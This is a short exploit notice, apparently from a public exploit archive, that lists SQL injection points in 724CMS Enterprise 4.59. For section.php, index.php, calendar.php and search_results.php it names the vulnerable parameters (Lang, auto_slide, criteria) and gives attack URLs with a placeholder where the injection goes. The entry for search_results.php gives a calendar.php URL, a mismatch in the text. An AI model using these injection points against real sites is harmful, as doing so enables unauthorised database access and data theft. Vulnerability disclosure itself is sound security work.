# Exploit Title: 724CMS Enterprise Version 4.59 Multiple SQL Injections
# Date: 11-5-10
# Author: t@nzo0n
# Version: 4.59 Enterprise
# Code :

[section.php]

[x] Variable : Lang
[x] Exploit : http://target.com/section.php?Nav=Section&ID=5&Lang=[sqlinjection]

[index.php]

[x] Variable : auto_slide
[x] Exploit : http://target.com/index.php?auto_slide=[sql injection]

[calendar.php]

[x] Variable : Lang
[x] Exploit :
http://target.com/calendar.php?ID=&Nav=Sitemap&criteria=&list_start=&list_end=&list_perpage=&Lang=[sqlinjection]

[search_results.php]

[x] Variable : criteria
[x] Exploit : http://target.com/calendar.php?ID=1&Nav=Section&criteria=[sqlinjection]